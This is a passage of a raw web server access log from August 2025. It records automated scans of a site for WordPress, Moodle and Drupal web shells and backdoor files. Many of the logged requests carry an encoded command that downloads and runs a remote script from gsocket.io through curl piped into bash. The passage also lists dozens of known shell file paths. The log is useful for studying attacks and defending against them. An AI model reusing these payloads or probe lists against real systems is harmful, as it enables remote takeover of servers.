/wp-api.php HTTP/1.1" 301 241 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:21 -0400] "GET /wp-comments.php HTTP/1.1" 301 246 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:21 -0400] "GET /wp-content/1.php HTTP/1.1" 301 247 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:22 -0400] "GET /wp-content/about.php HTTP/1.1" 301 251 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:22 -0400] "GET /wp-content/autoload_classmap.php HTTP/1.1" 301 263 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:22 -0400] "GET /wp-content/classwithtostring.php HTTP/1.1" 301 263 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:22 -0400] "GET /wp-content/click.php HTTP/1.1" 301 251 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:23 -0400] "GET /wp-content/index.php HTTP/1.1" 301 251 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:23 -0400] "GET /wp-content/languages/autoload_classmap.php HTTP/1.1" 301 273 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:23 -0400] "GET /wp-content/plugin.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:24 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 275 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:24 -0400] "GET /wp-content/plugins/autoload_classmap.php HTTP/1.1" 301 271 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:24 -0400] "GET /wp-content/plugins/ioxi/ioxi/dropdown.php HTTP/1.1" 301 272 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:24 -0400] "GET /wp-content/plugins/pwnd/as.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:25 -0400] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 292 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:25 -0400] "GET /wp-content/plugins/up/main.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:25 -0400] "GET /wp-content/themes/admin.php HTTP/1.1" 301 258 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:25 -0400] "GET /wp-content/uploads/chosen.php HTTP/1.1" 301 260 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:26 -0400] "GET /wp-content/uploads/de_fb_uploads/b.php HTTP/1.1" 301 269 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:26 -0400] "GET /wp-content/uploads/json.php HTTP/1.1" 301 258 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:26 -0400] "GET /wp-content/wp.php HTTP/1.1" 301 248 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:26 -0400] "GET /wp-content/x.php HTTP/1.1" 301 247 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:27 -0400] "GET /wp-error.php HTTP/1.1" 301 243 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:27 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:27 -0400] "GET /wp-includes/IXR/autoload_classmap.php HTTP/1.1" 301 268 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:27 -0400] "GET /wp-includes/IXR/chosen.php HTTP/1.1" 301 257 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:28 -0400] "GET /wp-includes/PHPMailer/file.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:28 -0400] "GET /wp-includes/SimplePie/chosen.php HTTP/1.1" 301 263 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:28 -0400] "GET /wp-includes/about.php HTTP/1.1" 301 252 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:28 -0400] "GET /wp-includes/blocks/about.php HTTP/1.1" 301 259 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:29 -0400] "GET /wp-includes/blocks/calendar/index.php HTTP/1.1" 301 268 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:29 -0400] "GET /wp-includes/blocks/site-title/index.php HTTP/1.1" 301 270 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:29 -0400] "GET /wp-includes/certificates/chosen.php HTTP/1.1" 301 266 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:30 -0400] "GET /wp-includes/css/autoload_classmap.php HTTP/1.1" 301 268 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:30 -0400] "GET /wp-includes/fonts/admin.php HTTP/1.1" 301 258 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:30 -0400] "GET /wp-includes/fonts/autoload_classmap.php HTTP/1.1" 301 270 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:30 -0400] "GET /wp-includes/fonts/index.php HTTP/1.1" 301 258 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:31 -0400] "GET /wp-includes/html-api/about.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:31 -0400] "GET /wp-includes/js/tinymce/langs/about.php HTTP/1.1" 301 269 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:31 -0400] "GET /wp-includes/rest-api/index.php HTTP/1.1" 301 261 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:31 -0400] "GET /wp-includes/style-engine/autoload_classmap.php HTTP/1.1" 301 277 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:32 -0400] "GET /wp-includes/widgets/autoload_classmap.php HTTP/1.1" 301 272 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:32 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 255 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:32 -0400] "GET /wp-includes/wp_class_datlib.php HTTP/1.1" 301 262 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:32 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 243 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:33 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:33 -0400] "GET /wp-logs.php HTTP/1.1" 301 242 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:33 -0400] "GET /wp-setting.php HTTP/1.1" 301 245 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:34 -0400] "GET /wp-setup.php HTTP/1.1" 301 243 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:34 -0400] "GET /wp-signin.php HTTP/1.1" 301 244 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:34 -0400] "GET /wp-wso.php HTTP/1.1" 301 241 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:34 -0400] "GET /wp.php HTTP/1.1" 301 237 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:35 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 250 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:35 -0400] "GET /wsa.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:35 -0400] "GET /wso.php HTTP/1.1" 301 238 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:36 -0400] "GET /y.php HTTP/1.1" 301 236 "-" "-" 13.94.92.103 - - [13/Aug/2025:10:57:36 -0400] "GET /zwso.php HTTP/1.1" 301 239 "-" "-" 86.8.204.43 - - [13/Aug/2025:11:11:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:11:11:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:11:11:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:11:11:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:11:26:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:11:26:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:11:26:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:11:26:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 108.174.2.218 - - [13/Aug/2025:11:32:10 -0400] "GET / HTTP/1.1" 301 231 "-" "LinkedInBot/1.0 (compatible; Mozilla/5.0; Apache-HttpClient +http://www.linkedin.com)" 68.183.245.101 - - [13/Aug/2025:11:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:11:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:11:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:11:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 66.220.149.3 - - [13/Aug/2025:11:47:06 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 167.172.79.34 - - [13/Aug/2025:11:53:23 -0400] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 332 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:27 -0400] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 342 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:31 -0400] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 299 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:35 -0400] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 301 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:39 -0400] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 345 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:42 -0400] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 334 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:46 -0400] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:49 -0400] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:54 -0400] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 340 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:53:59 -0400] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 324 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:02 -0400] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:06 -0400] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 349 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:10 -0400] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 336 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:13 -0400] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 354 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:17 -0400] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:20 -0400] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 349 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:24 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:27 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:35 -0400] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:38 -0400] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 300 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:41 -0400] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:44 -0400] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:48 -0400] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:52 -0400] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:54:56 -0400] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 311 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:00 -0400] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 319 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:06 -0400] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:10 -0400] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 319 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:14 -0400] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:18 -0400] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:21 -0400] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:24 -0400] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:28 -0400] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:30 -0400] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:42 -0400] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:45 -0400] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:48 -0400] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:50 -0400] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 313 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:53 -0400] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 312 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:55:56 -0400] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4" 68.183.245.101 - - [13/Aug/2025:11:55:58 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:11:55:58 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:11:55:58 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:11:55:58 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 167.172.79.34 - - [13/Aug/2025:11:55:59 -0400] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:02 -0400] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:05 -0400] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:08 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:11 -0400] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:14 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:17 -0400] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:19 -0400] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:22 -0400] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 317 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:25 -0400] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:28 -0400] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:32 -0400] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:35 -0400] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 302 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:38 -0400] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:41 -0400] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:44 -0400] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:48 -0400] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:51 -0400] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:54 -0400] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:56:57 -0400] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 312 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:57:01 -0400] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 311 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:57:05 -0400] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:57:10 -0400] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:57:13 -0400] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4" 167.172.79.34 - - [13/Aug/2025:11:57:16 -0400] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4" 66.249.74.1 - - [13/Aug/2025:12:03:29 -0400] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.74.1 - - [13/Aug/2025:12:03:31 -0400] "GET /assets/img/2.No%20cost%20EMI.png HTTP/1.1" 301 267 "-" "Googlebot-Image/1.0" 145.220.91.19 - - [13/Aug/2025:12:08:53 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 68.183.245.101 - - [13/Aug/2025:12:12:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:12:12:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:12:12:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:12:12:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 172.192.63.224 - - [13/Aug/2025:12:13:02 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 172.192.63.224 - - 